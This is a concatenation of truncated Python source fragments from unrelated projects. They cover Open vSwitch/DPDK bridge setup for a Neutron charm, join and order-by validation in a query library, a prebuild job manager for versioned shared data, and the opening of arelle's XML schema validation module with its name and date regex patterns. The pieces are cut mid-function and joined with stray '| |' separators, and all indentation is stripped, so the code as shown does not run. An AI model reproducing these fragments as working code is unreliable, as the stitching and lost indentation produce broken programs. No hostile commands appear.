log('Setting {}:{} in the Open_vSwitch table'.format(column, value))
subprocess.check_call(['ovs-vsctl', 'set', 'Open_vSwitch',
'.', '{}={}'.format(column,
value)])
return True
return False
def enable_ovs_dpdk():
'''Enables the DPDK variant of ovs-vswitchd and restarts it'''
subprocess.check_call(UPDATE_ALTERNATIVES + [OVS_DPDK_BIN])
values_changed = []
if ovs_has_late_dpdk_init():
dpdk_context = neutron_ovs_context.OVSDPDKDeviceContext()
other_config = OrderedDict([
('pmd-cpu-mask', dpdk_context.cpu_mask()),
('dpdk-socket-mem', dpdk_context.socket_memory()),
('dpdk-extra',
'--vhost-owner libvirt-qemu:kvm --vhost-perm 0660'),
('dpdk-init', 'true'),
])
for column, value in other_config.items():
values_changed.append(
set_Open_vSwitch_column_value(
'other_config:{}'.format(column),
value
)
)
if ((values_changed and any(values_changed)) and
not is_unit_paused_set()):
service_restart('openvswitch-switch')
def install_tmpfilesd():
'''Install systemd-tmpfiles configuration for ovs vhost-user sockets'''
# NOTE(jamespage): Only do this if libvirt is actually installed
if (init_is_systemd() and
user_exists('libvirt-qemu') and
group_exists('kvm')):
shutil.copy('files/nova-ovs-vhost-user.conf',
'/etc/tmpfiles.d')
subprocess.check_call(['systemd-tmpfiles', '--create'])
def configure_ovs():
status_set('maintenance', 'Configuring ovs')
if not service_running('openvswitch-switch'):
full_restart()
datapath_type = determine_datapath_type()
add_bridge(INT_BRIDGE, datapath_type)
add_bridge(EXT_BRIDGE, datapath_type)
ext_port_ctx = None
if use_dvr():
ext_port_ctx = ExternalPortContext()()
if ext_port_ctx and ext_port_ctx['ext_port']:
add_bridge_port(EXT_BRIDGE, ext_port_ctx['ext_port'])
modern_ovs = ovs_has_late_dpdk_init()
bridgemaps = None
if not use_dpdk():
portmaps = DataPortContext()()
bridgemaps = parse_bridge_mappings(config('bridge-mappings'))
for br in bridgemaps.values():
add_bridge(br, datapath_type)
if not portmaps:
continue
for port, _br in portmaps.items():
if _br == br:
if not is_linuxbridge_interface(port):
add_bridge_port(br, port, promisc=True)
else:
add_ovsbridge_linuxbridge(br, port)
else:
# NOTE: when in dpdk mode, add based on pci bus order
# with type 'dpdk'
bridgemaps = neutron_ovs_context.resolve_dpdk_bridges()
device_index = 0
for pci_address, br in bridgemaps.items():
add_bridge(br, datapath_type)
if modern_ovs:
portname = 'dpdk-{}'.format(
hashlib.sha1(pci_address.encode('UTF-8')).hexdigest()[:7]
)
else:
portname = 'dpdk{}'.format(device_index)
dpdk_add_bridge_port(br, portname,
pci_address)
device_index += 1
if modern_ovs:
bondmaps = neutron_ovs_context.resolve_dpdk_bonds()
bridge_bond_map = DPDKBridgeBondMap()
portmap = parse_data_port_mappings(config('data-port'))
for pci_address, bond in bondmaps.items():
if bond in portmap:
add_bridge(portmap[bond], datapath_type)
portname = 'dpdk-{}'.format(
hashlib.sha1(pci_address.encode('UTF-8'))
.hexdigest()[:7]
)
bridge_bond_map.add_port(portmap[bond], bond,
portname, pci_address)
bond_configs = DPDKBondsConfig()
for br, bonds in bridge_bond_map.items():
for bond, port_map in bonds.items():
dpdk_add_bridge_bond(br, bond, port_map)
dpdk_set_bond_config(
bond,
bond_configs.get_bond_config(bond)
)
target = config('ipfix-target')
bridges = [INT_BRIDGE, EXT_BRIDGE]
if bridgemaps:
bridges.extend(bridgemaps.values())
if target:
for bridge in bridges:
disable_ipfix(bridge)
enable_ipfix(bridge, target)
else:
# | |
[]
root2clauses = {}
# Separate the clauses
for clause in clauses:
roots = [hashable_path(p) for p in clause.roots]
if len(roots) == 1:
root2clauses.setdefault(roots[0],[]).append(clause)
else:
catchall.append(clause)
# Generate clause blocks
clauseblocks = []
for root,clauses in root2clauses.items():
clauseblocks.append(ClauseBlock(clauses))
if catchall: return (clauseblocks, ClauseBlock(catchall))
else: return (clauseblocks, None)
# ------------------------------------------------------------------------------
# To support database-like inner joins. Join conditions are made from
# QCondition objects with the standard comparison operators
# ------------------------------------------------------------------------------
def is_join_qcondition(cond):
if not isinstance(cond, QCondition): return False
spec = StandardComparator.operators.get(cond.operator, None)
if spec is None: return False
return spec.join
# ------------------------------------------------------------------------------
# validate join expression. Turns QCondition objects into Join objects Note:
# joinall (the trueall operator) are used for ensure a connected graph but are
# then removed as they don't add anything.
# ------------------------------------------------------------------------------
def validate_join_expression(qconds, roots):
jroots = set() # The set of all roots in the join clauses
joins = [] # The list of joins
edges = {} # Edges to ensure a fully connected graph
def add_join(join):
nonlocal edges, joins, jroots
joins.append(join)
jr = set([ hashable_path(r) for r in join.roots])
jroots.update(jr)
if len(jr) != 2:
raise ValueError(("Internal bug: join specification should have "
"exactly two root paths: '{}'").format(jr))
x,y = jr
edges.setdefault(x,[]).append(y)
edges.setdefault(y,[]).append(x)
remain = jr - broots
if remain:
raise ValueError(("Join specification '{}' contains unmatched "
"root paths '{}'").format(jr,remain))
# Check that the join graph is connected by counting the visited nodes from
# some starting point.
def is_connected():
nonlocal edges, joins, jroots
visited = set()
def visit(r):
visited.add(r)
for c in edges[r]:
if c in visited: continue
visit(c)
for start in jroots:
visit(start)
break
return visited == jroots
# Make sure we have a set of hashable paths
try:
broots = set([ hashable_path(root) for root in roots ])
except Exception as e:
raise ValueError(("Invalid predicate paths signature {}: "
"{}").format(roots,e)) from None
if not broots:
raise ValueError(("Specification of join without root paths "
"doesn't make sense"))
for p in broots:
if not p.path.meta.is_root:
raise ValueError(("Invalid field specification {} does not refer to "
"the root of a predicate path ").format(p))
for qcond in qconds:
if not is_join_qcondition(qcond):
if not isinstance(qcond,QCondition):
raise ValueError(("Invalid join element '{}': expecting a "
"comparison specifying the join "
"between two fields").format(qcond))
else:
raise ValueError(("Invalid join operator '{}' in "
"{}").format(qcond.operator,qcond))
add_join(StandardComparator.from_join_qcondition(qcond))
# Check that we have all roots in the join matches the base roots
if jroots != broots:
raise ValueError(("Invalid join specification: missing joins for "
"'{}'").format(broots-jroots))
if not is_connected():
raise ValueError(("Invalid join specification: contains un-joined "
"components '{}'").format(qconds))
# Now that we've validated the graph can remove all the pure
# cross-product/join-all joins.
return list(filter(lambda x: x.operator != trueall, joins))
# ------------------------------------------------------------------------------
# process_join takes a join expression (a list of join statements) from the
# user select statement as well as a list of roots; validates the join
# statements (ensuring that they only refers to paths derived from one of the
# roots) and turns it into a list of validated StandardComparators that have
# paths as both arguments
# ------------------------------------------------------------------------------
def process_join(join_expression, roots=[]):
def _prevalidate():
for j in join_expression:
if not isinstance(j,QCondition):
raise TypeError("'{}' ({}) is not a valid 'join' in '{}'".format(
j,type(j),join_expression))
_prevalidate()
return validate_join_expression(join_expression,roots)
#------------------------------------------------------------------------------
# Specification of an ordering over a field of a predicate/complex-term
#------------------------------------------------------------------------------
class OrderBy(object):
def __init__(self, path, asc):
self._path = path
self._asc = asc
@property
def path(self):
return self._path
@property
def asc(self):
return self._asc
def dealias(self):
dealiased = path(self._path).meta.dealiased
if hashable_path(self._path) == hashable_path(dealiased): return self
return OrderBy(dealiased,self._asc)
def __eq__(self, other):
if not isinstance(other, self.__class__): return NotImplemented
if hashable_path(self._path) != hashable_path(other._path): return False
return self._asc == other._asc
def __ne__(self, other):
result = self.__eq__(other)
if result is NotImplemented: return NotImplemented
return not result
def __hash__(self):
return hash((hashable_path(self._path),self._asc))
def __str__(self):
if self._asc: return "asc({})".format(self._path)
else: return "desc({})".format(self._path)
def __repr__(self):
return self.__str__()
#------------------------------------------------------------------------------
# Helper functions to return a OrderBy in descending and ascending order. Input
# is a PredicatePath. The ascending order function is provided for completeness
# since the order_by parameter will treat a path as ascending order by default.
# ------------------------------------------------------------------------------
def desc(pth):
return OrderBy(path(pth),asc=False)
def asc(pth):
return OrderBy(path(pth),asc=True)
# ------------------------------------------------------------------------------
# OrderByBlock groups together an ordering of OrderBy statements
# ------------------------------------------------------------------------------
class OrderByBlock(object):
def __init__(self,orderbys=[]):
self._orderbys = tuple(orderbys)
self._paths = tuple([path(ob.path) for ob in self._orderbys])
# if not orderbys:
# raise ValueError("Empty list of order_by statements")
@property
def paths(self):
return self._paths
@property
def roots(self):
return set([hashable_path(p.meta.root) for p in self._paths])
def dealias(self):
neworderbys = tuple([ob.dealias() for ob in self._orderbys])
if self._orderbys == neworderbys: return self
return OrderByBlock(neworderbys)
def __eq__(self, other):
if isinstance(other, self.__class__):
return self._orderbys == other._orderbys
if isinstance(other, tuple):
return self._orderbys == other
if isinstance(other, list):
return self._orderbys == tuple(other)
return NotImplemented
def __ne__(self, other):
result = self.__eq__(other)
if result is NotImplemented: return NotImplemented
return not result
def __len__(self):
return len(self._orderbys)
def __getitem__(self, idx):
return self._orderbys[idx]
def __iter__(self):
return iter(self._orderbys)
def __hash__(self):
return hash(self._orderbys)
def __bool__(self):
return bool(self._orderbys)
def __str__(self):
return "[{}]".format(",".join([str(ob) for ob in self._orderbys]))
def __repr__(self):
return self.__str__()
# ------------------------------------------------------------------------------
# Validate the order_by expression - returns an OrderByBlock
# ------------------------------------------------------------------------------
def validate_orderby_expression(orderby_expressions, roots=[]):
if not is_root_paths(roots):
raise ValueError("roots='{}' must contain only root paths".format(roots))
hroots = set([hashable_path(rp) for rp in roots])
path_ordering = []
# If only a PredicatePath is specified assume ascending order
for exp in orderby_expressions:
if isinstance(exp, OrderBy): path_ordering.append(exp)
elif isinstance(exp, PredicatePath):
path_ordering.append(asc(exp))
elif inspect.isclass(exp) and issubclass(exp, Predicate):
path_ordering.append(asc(path(exp)))
else: raise ValueError("Invalid 'order_by' expression: {}".format(exp))
obb = OrderByBlock(path_ordering)
if not obb.roots.issubset(hroots):
raise ValueError(("Invalid 'order_by' expression '{}' refers to root paths that "
"are not in '{}'").format(obb, hroots))
return obb
# ------------------------------------------------------------------------------
# Return an OrderByBlock corresponding to the validated order by expression
# ------------------------------------------------------------------------------
def process_orderby(orderby_expressions, roots=[]):
return validate_orderby_expression(orderby_expressions,roots)
# ------------------------------------------------------------------------------
# Return an OrderByBlock for an ordered flag
# ------------------------------------------------------------------------------
def process_ordered(roots):
ordering=[asc(r) for r in roots]
return OrderByBlock(ordering)
# ------------------------------------------------------------------------------
# make_prejoin_pair(indexed_paths, clauses)
#
# Given a set of indexed paths and a set of clauses that refer to a single root
# try to extract a preferred clause that can be used for indexing.
#
# - indexed_paths - a list of paths for which there is a factindex
# - clauses - a clause block that can only refer to a single root
# ------------------------------------------------------------------------------
def make_prejoin_pair(indexed_paths, clauseblock):
def preference(cl):
c = min(cl, key=lambda c: c.preference)
return c.preference
def is_candidate_sc(indexes, sc):
if len(sc.paths) != 1: return False
return hashable_path(sc.paths[0].meta.dealiased) in indexes
def is_candidate(indexes, cl):
for c in cl:
if not isinstance(c, StandardComparator): return False
if not is_candidate_sc(indexes,c): return False
return True
if not clauseblock: return (None,None)
tmp = set([hashable_path(p.meta.dealiased) for p in clauseblock.paths])
indexes = set(filter(lambda x: x in tmp,
[hashable_path(p) for p in indexed_paths]))
# Search for a candidate to use with a fact index
keyclause = None
candidates = []
rest = []
for cl in clauseblock:
if is_candidate(indexes, cl): candidates.append(cl)
else: rest.append(cl)
if not candidates: return (None, clauseblock)
# order the candidates by their comparator preference and take the first
candidates.sort(key=lambda cl : preference(cl), reverse=True)
rest.extend(candidates[1:])
cb = ClauseBlock(rest) if rest else None
return (candidates[0],cb)
# ------------------------------------------------------------------------------
# make_join_pair(joins, clauseblock)
# - a list of join StandardComparators
# - an existing clauseblock (or None)
# - a list of orderby statements
#
# Takes a list of joins and picks the best one for indexing (based on their
# operator preference and the orderby statements). Returns a pair that is the
# chosen join and the rest of the joins added to the input clauseblock.
# ------------------------------------------------------------------------------
def make_join_pair(joins, clauseblock, orderbys=[]):
opaths=set([hashable_path(ob.path) for ob in orderbys])
def num(sc):
return len(opaths & (set([hashable_path(p) for p in sc.paths])))
if not joins: return (None,clauseblock)
joins = sorted(joins, key=lambda x : (x.preference, num(x)), reverse=True)
joinsc = joins[0]
remainder = joins[1:]
if remainder:
remainder = ClauseBlock([Clause([sc]) for sc in remainder])
if clauseblock: return (joinsc, clauseblock + remainder)
else: return (joinsc, remainder)
else:
if clauseblock: return (joinsc, clauseblock)
else: return (joinsc, None)
# ------------------------------------------------------------------------------
# JoinQueryPlan support functions. The JQP is a part of the query plan that
# describes the plan to execute a single link in a join.
# ------------------------------------------------------------------------------
# Check that the formula only refers to paths with the allowable roots
def _check_roots(allowable_roots, formula):
if not formula: return True
allowable_hroots = set([hashable_path(rp) for rp in allowable_roots])
hroots = | |
<reponame>MarcoMernberger/mbf_externals
"""
Many algorithms need prebuild data structures (indices and so on)
which both are too time consuming to build, to big to copy to each
experiment and need to be versioned,
but they can often be shared among versions."""
import socket
from .util import Version, sort_versions, UpstreamChangedError, write_md5_sum
import pypipegraph as ppg
from pathlib import Path
import time
import stat
import os
import json
class PrebuildFunctionInvariantFileStoredExploding(ppg.FunctionInvariant):
def __init__(self, storage_filename, func):
self.is_prebuild = True
super().__init__(storage_filename, func)
@classmethod
def hash_function(cls, function):
new_source, new_funchash, new_closure = cls._hash_function(function)
return cls._compare_new_and_old(new_source, new_funchash, new_closure, False)
def _get_invariant(self, old, all_invariant_stati):
stf = Path(
self.job_id
) # the old file format - using just the function's dis-ed code.
stf2 = Path(self.job_id).with_name(
stf.name + "2"
) # the new style, dict based storage just like FunctionInvariant after 0.190
new_source, new_func_hash, new_closure = self._hash_function(self.function)
if stf2.exists():
old_hash = json.loads(stf2.read_text())
elif stf.exists():
old_hash = stf.read_text()
new_closure = ""
else:
new_value = self._compare_new_and_old(
new_source, new_func_hash, new_closure, False
)
stf2.write_text(json.dumps(new_value))
return old # signal no change necessary.
try:
new_hash = self._compare_new_and_old(
new_source, new_func_hash, new_closure, old_hash
)
if new_hash != old_hash:
self.complain_about_hash_changes(new_hash)
else:
return old
except ppg.NothingChanged as e:
# we accept the stuff there as no change.
# and we write out the new value, because it might be a format change.
try:
stf2.write_text(json.dumps(e.new_value))
except OSError as e2:
if "Read-only file system" in str(e2):
import warnings
warnings.warn(
"PrebuildFunctionInvariantFileStoredExploding: Could not update %s to newest version - read only file system"
% stf
)
raise e
raise NotImplementedError("Should not happen")
def complain_about_hash_changes(self, invariant_hash):
stf = Path(self.job_id)
try:
of = stf.with_name(stf.name + ".changed")
of.write_text(json.dumps(invariant_hash))
except IOError: # noqa: E722 pragma: no cover
# fallback if the stf directory is not writeable.
of = Path(stf.name + ".changed") # pragma: no cover
of.write_text(json.dumps(invariant_hash)) # pragma: no cover
raise UpstreamChangedError(
(
"Calculating function changed.\n"
"If you are actively working on it, you need to bump the version:\n"
"If not, you need to figure out what's causing the change.\n"
"Do not nuke the job info (%s) light heartedly\n"
"To compare, run \n"
"icdiff %s %s"
)
% (self.job_id, Path(self.job_id).absolute(), of.absolute())
)
class _PrebuildFileInvariantsExploding(ppg.MultiFileInvariant):
"""Used by PrebuildJob to handle input file deps"""
def __new__(cls, job_id, filenames):
job_id = "PFIE_" + str(job_id)
return ppg.Job.__new__(cls, job_id)
def __init__(self, job_id, filenames):
job_id = "PFIE_" + str(job_id)
self.filenames = filenames
for f in filenames:
if not (isinstance(f, str) or isinstance(f, Path)): # pragma: no cover
raise ValueError(f"filenames must be str/path. Was {repr(f)}")
self.is_prebuild = True
ppg.Job.__init__(self, job_id)
def calc_checksums(self, old):
"""return a list of tuples
(filename, filetime, filesize, checksum)"""
result = []
if old:
old_d = {x[0]: x[1:] for x in old}
else:
old_d = {}
for fn in self.filenames:
if not os.path.exists(fn):
result.append((fn, None, None, None))
else:
st = os.stat(fn)
filetime = st[stat.ST_MTIME]
filesize = st[stat.ST_SIZE]
if (
fn in old_d
and (old_d[fn][0] == filetime)
and (old_d[fn][1] == filesize)
): # we can reuse the checksum
result.append((fn, filetime, filesize, old_d[fn][2]))
else:
result.append((fn, filetime, filesize, ppg.util.checksum_file(fn)))
return result
def _get_invariant(self, old, all_invariant_stati):
if not old:
old = self.find_matching_renamed(all_invariant_stati)
checksums = self.calc_checksums(old)
if old is False:
raise ppg.ppg_exceptions.NothingChanged(checksums)
# elif old is None: # not sure when this would ever happen
# return checksums
else:
old_d = {x[0]: x[1:] for x in old}
checksums_d = {x[0]: x[1:] for x in checksums}
for fn in self.filenames:
if old_d[fn][2] != checksums_d[fn][2] and old_d[fn][2] is not None:
raise UpstreamChangedError(
"""Upstream file changed for job, bump version or rollback.
Job: %s
File: %s"""
% (self, fn)
)
# return checksums
raise ppg.ppg_exceptions.NothingChanged(checksums)
class PrebuildJob(ppg.MultiFileGeneratingJob):
def __new__(cls, filenames, calc_function, output_path):
if not hasattr(filenames, "__iter__"):
raise TypeError("filenames was not iterable")
for x in filenames:
if not (isinstance(x, str) or isinstance(x, Path)):
raise TypeError("filenames must be a list of strings or pathlib.Path")
for of in filenames:
if of.is_absolute():
raise ValueError("output_files must be relative")
filenames = cls._normalize_output_files(filenames, output_path)
job_id = ":".join(sorted(str(x) for x in filenames))
res = ppg.Job.__new__(cls, job_id)
res.filenames = filenames
res.output_path = Path(output_path)
return res
@classmethod
def _normalize_output_files(cls, output_files, output_path):
output_files = [
Path(cls.verify_job_id(output_path / of)) for of in output_files
]
output_files.append(Path(cls.verify_job_id(output_path / "mbf.done")))
return output_files
def __init__(self, output_files, calc_function, output_path):
output_files = self._normalize_output_files(output_files, output_path)
output_path.mkdir(parents=True, exist_ok=True)
self.real_callback = calc_function
self.is_prebuild = True
def calc():
self.real_callback(output_path)
output_files[-1].write_text(str(time.time()))
for fn in output_files[:-1]:
if os.path.exists(fn):
write_md5_sum(fn)
super().__init__(output_files, calc, rename_broken=True, empty_ok=True)
self.output_path = output_path
def depends_on_func(self, name, func):
job = PrebuildFunctionInvariantFileStoredExploding(
self.output_path / ("%s.md5sum" % (name,)), func
)
self.depends_on(job)
return job
def depends_on_file(self, filename):
job = _PrebuildFileInvariantsExploding(filename, [filename])
self.depends_on(job)
return job
def depends_on(self, jobs):
for job in ppg.util.flatten_jobs(jobs):
if not hasattr(job, "is_prebuild") or not job.is_prebuild:
raise ppg.JobContractError(
"%s depended on a non-prebuild dependency %s - not supported"
% (self, job)
)
ppg.Job.depends_on(self, job)
return self
def inject_auto_invariants(self):
self.depends_on_func("mbf_func", self.real_callback)
def invalidated(self, reason):
exists = [Path(of).exists() for of in self.filenames]
if all(exists) or not any(exists):
pass
else:
raise ValueError(
"Some output files existed, some don't - undefined state, manual cleanup needed\n:%s"
% (list(zip(self.filenames, exists)))
)
self.was_invalidated = True
def name_file(self, output_filename):
"""Adjust path of output_filename by job path"""
return self.output_path / output_filename
def find_file(self, output_filename):
"""Search for a file named output_filename in the job's known created files"""
of = self.name_file(output_filename)
for fn in self.filenames:
if of.resolve() == Path(fn).resolve():
return of
else:
raise KeyError("file not found: %s" % output_filename)
class PrebuildManager:
def __init__(self, prebuilt_path, hostname=None):
self.prebuilt_path = Path(prebuilt_path)
self.hostname = hostname if hostname else socket.gethostname()
(self.prebuilt_path / self.hostname).mkdir(exist_ok=True)
def _find_versions(self, name):
result = {}
dirs_to_consider = [
p
for p in self.prebuilt_path.glob("*")
if (p / name).exists() and p.name != self.hostname
]
# prefer versions from this host - must be last!
dirs_to_consider.append(self.prebuilt_path / self.hostname)
for p in dirs_to_consider:
for v in (p / name).glob("*"):
if (v / "mbf.done").exists():
result[v.name] = v
return result
def prebuild( # noqa: C901
self,
name,
version,
input_files,
output_files,
calculating_function,
minimum_acceptable_version=None,
maximum_acceptable_version=None,
further_function_deps={},
):
"""Create a job that will prebuilt the files if necessary
@further_function_deps is a dictionary name => func,
and will end up as PrebuildFunctionInvariantFileStoredExploding
in the correct directory
"""
if minimum_acceptable_version is None:
minimum_acceptable_version = version
available_versions = self._find_versions(name)
if version in available_versions:
output_path = available_versions[version]
else:
# these are within minimum..maximum_acceptable_version
acceptable_versions = sort_versions(
[
(v, p)
for v, p in available_versions.items()
if (
(Version(v) >= minimum_acceptable_version)
and (
maximum_acceptable_version is None
or (Version(v) < maximum_acceptable_version)
)
)
]
)
ok_versions = []
(
new_source,
new_funchash,
new_closure,
) = ppg.FunctionInvariant._hash_function(calculating_function)
for v, p in acceptable_versions:
func_md5sum_path = p / "mbf_func.md5sum"
func_md5sum_path2 = p / "mbf_func.md5sum2"
try:
func_md5sum = json.loads(func_md5sum_path2.read_text())
except OSError:
func_md5sum = func_md5sum_path.read_text()
ok = False
try:
new = ppg.FunctionInvariant._compare_new_and_old(
new_source, new_funchash, new_closure, func_md5sum
)
ok = False
except ppg.NothingChanged:
ok = True
if ok:
ok_versions.append((v, p))
if ok_versions:
version, output_path = ok_versions[-1]
else: # no version that is within the acceptable range and had the same build function
output_path = self.prebuilt_path / self.hostname / name / version
if isinstance(output_files, (str, Path)):
output_files = [output_files]
output_files = [Path(of) for of in output_files]
if ppg.inside_ppg():
job = PrebuildJob(output_files, calculating_function, output_path)
job.depends_on(_PrebuildFileInvariantsExploding(output_path, input_files))
job.version = version
return job
else:
for of in output_files:
if not (output_path / of).exists():
raise ValueError(
"%s was missing and prebuild used outside of ppg - can't build it"
% (output_path / of).absolute()
)
class DummyJob:
"""just enough of the Jobs interface to ignore the various calls
and allow finding the msgpack jobs
"""
def __init__(self, output_path, filenames):
self.output_path = output_path
self.filenames = PrebuildJob._normalize_output_files(
filenames, output_path
)
# self.job_id = ":".join(sorted(str(x) for x in filenames))
def depends_on(self, _other_job): # pragma: no cover
return self
def depends_on_func(self, _name, _func): # pragma: no cover
return self
def depends_on_file(self, _filename): # pragma: no cover
return self
def name_file(self, output_filename):
"""Adjust path of output_filename by job path"""
return self.output_path / output_filename
def find_file(self, output_filename):
"""Search for a file named output_filename in the job's known created files"""
of = self.name_file(output_filename)
for fn in self.filenames:
if of.resolve() == Path(fn).resolve():
return of
else:
raise KeyError("file not found: %s" % output_filename)
def __iter__(self):
yield self
return DummyJob(output_path, output_files)
_global_manager = None
def change_global_manager(new_manager):
| |
<filename>arelle/XmlValidate.py
'''
Created on Feb 20, 2011
@author: Mark V Systems Limited
(c) Copyright 2011 Mark V Systems Limited, All rights reserved.
'''
import os, logging
from lxml import etree
try:
from regex import compile as re_compile
except ImportError:
from re import compile as re_compile
from decimal import Decimal, InvalidOperation
from fractions import Fraction
from arelle import XbrlConst, XmlUtil
from arelle.ModelValue import (qname, qnameEltPfxName, qnameClarkName, qnameHref,
dateTime, DATE, DATETIME, DATEUNION,
anyURI, INVALIDixVALUE, gYearMonth, gMonthDay, gYear, gMonth, gDay, isoDuration)
from arelle.ModelObject import ModelObject, ModelAttribute
from arelle.PythonUtil import strTruncate
from arelle import UrlUtil
validateElementSequence = None #dynamic import to break dependency loops
modelGroupCompositorTitle = None
ModelInlineValueObject = None
ixMsgCode = None
UNVALIDATED = 0 # note that these values may be used a constants in code for better efficiency
UNKNOWN = 1
INVALID = 2
NONE = 3
VALID = 4 # values >= VALID are valid
VALID_ID = 5
VALID_NO_CONTENT = 6 # may be a complex type with children, must be last (after VALID with content enums)
normalizeWhitespacePattern = re_compile(r"[\t\n\r]") # replace tab, line feed, return with space (XML Schema Rules, note: does not include NBSP)
collapseWhitespacePattern = re_compile(r"[ \t\n\r]+") # collapse multiple spaces, tabs, line feeds and returns to single space
entirelyWhitespacePattern = re_compile(r"^[ \t\n\r]+$") # collapse multiple spaces, tabs, line feeds and returns to single space
languagePattern = re_compile("[a-zA-Z]{1,8}(-[a-zA-Z0-9]{1,8})*$")
NCNamePattern = re_compile("^[_A-Za-z\xC0-\xD6\xD8-\xF6\xF8-\xFF\u0100-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD]"
r"[_\-\."
"\xB7A-Za-z0-9\xC0-\xD6\xD8-\xF6\xF8-\xFF\u0100-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD\u0300-\u036F\u203F-\u2040]*$")
QNamePattern = re_compile("^([_A-Za-z\xC0-\xD6\xD8-\xF6\xF8-\xFF\u0100-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD]"
r"[_\-\."
"\xB7A-Za-z0-9\xC0-\xD6\xD8-\xF6\xF8-\xFF\u0100-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD\u0300-\u036F\u203F-\u2040]*:)?"
"[_A-Za-z\xC0-\xD6\xD8-\xF6\xF8-\xFF\u0100-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD]"
r"[_\-\."
"\xB7A-Za-z0-9\xC0-\xD6\xD8-\xF6\xF8-\xFF\u0100-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD\u0300-\u036F\u203F-\u2040]*$")
namePattern = re_compile("^[_A-Za-z\xC0-\xD6\xD8-\xF6\xF8-\xFF\u0100-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD]"
r"[_\-\.:"
"\xB7A-Za-z0-9\xC0-\xD6\xD8-\xF6\xF8-\xFF\u0100-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD\u0300-\u036F\u203F-\u2040]*$")
NMTOKENPattern = re_compile(r"[_\-\.:"
"\xB7A-Za-z0-9\xC0-\xD6\xD8-\xF6\xF8-\xFF\u0100-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD\u0300-\u036F\u203F-\u2040]+$")
decimalPattern = re_compile(r"^[+-]?([0-9]+(\.[0-9]*)?|\.[0-9]+)$")
integerPattern = re_compile(r"^[+-]?([0-9]+)$")
floatPattern = re_compile(r"^(\+|-)?([0-9]+(\.[0-9]*)?|\.[0-9]+)([Ee](\+|-)?[0-9]+)?$|^(\+|-)?INF$|^NaN$")
lexicalPatterns = {
"duration": re_compile(r"-?P((([0-9]+Y([0-9]+M)?([0-9]+D)?|([0-9]+M)([0-9]+D)?|([0-9]+D))(T(([0-9]+H)([0-9]+M)?([0-9]+(\.[0-9]+)?S)?|([0-9]+M)([0-9]+(\.[0-9]+)?S)?|([0-9]+(\.[0-9]+)?S)))?)|(T(([0-9]+H)([0-9]+M)?([0-9]+(\.[0-9]+)?S)?|([0-9]+M)([0-9]+(\.[0-9]+)?S)?|([0-9]+(\.[0-9]+)?S))))$"),
"gYearMonth": re_compile(r"-?([1-9][0-9]{3,}|0[0-9]{3})-(0[1-9]|1[0-2])(Z|(\+|-)((0[0-9]|1[0-3]):[0-5][0-9]|14:00))?$"),
"gYear": re_compile(r"-?([1-9][0-9]{3,}|0[0-9]{3})(Z|(\+|-)((0[0-9]|1[0-3]):[0-5][0-9]|14:00))?$"),
"gMonthDay": re_compile(r"--(0[1-9]|1[0-2])-(0[1-9]|[12][0-9]|3[01])(Z|(\+|-)((0[0-9]|1[0-3]):[0-5][0-9]|14:00))?$"),
"gDay": re_compile(r"---(0[1-9]|[12][0-9]|3[01])(Z|(\+|-)((0[0-9]|1[0-3]):[0-5][0-9]|14:00))?$"),
"gMonth": re_compile(r"--(0[1-9]|1[0-2])(Z|(\+|-)((0[0-9]|1[0-3]):[0-5][0-9]|14:00))?$"),
"language": re_compile(r"[a-zA-Z]{1,8}(-[a-zA-Z0-9]{1,8})*$"),
"XBRLI_DATEUNION": re_compile(r"\s*-?[0-9]{4}-[0-9]{2}-[0-9]{2}(T[0-9]{2}:[0-9]{2}:[0-9]{2}([.][0-9]+)?)?(Z|[+-][0-9]{2}:[0-9]{2})?\s*$"),
"dateTime": re_compile(r"\s*-?[0-9]{4}-[0-9]{2}-[0-9]{2}T[0-9]{2}:[0-9]{2}:[0-9]{2}([.][0-9]+)?(Z|[+-][0-9]{2}:[0-9]{2})?\s*$"),
"date": re_compile(r"\s*-?[0-9]{4}-[0-9]{2}-[0-9]{2}(Z|[+-][0-9]{2}:[0-9]{2})?\s*$"),
}
# patterns difficult to compile into python
xmlSchemaPatterns = {
r"\c+": NMTOKENPattern,
r"\i\c*": namePattern,
r"[\i-[:]][\c-[:]]*": NCNamePattern,
}
# patterns to replace \c and \i in names
iNameChar = "[_A-Za-z\xC0-\xD6\xD8-\xF6\xF8-\xFF\u0100-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD]"
cNameChar = r"[_\-\.:" "\xB7A-Za-z0-9\xC0-\xD6\xD8-\xF6\xF8-\xFF\u0100-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD\u0300-\u036F\u203F-\u2040]"
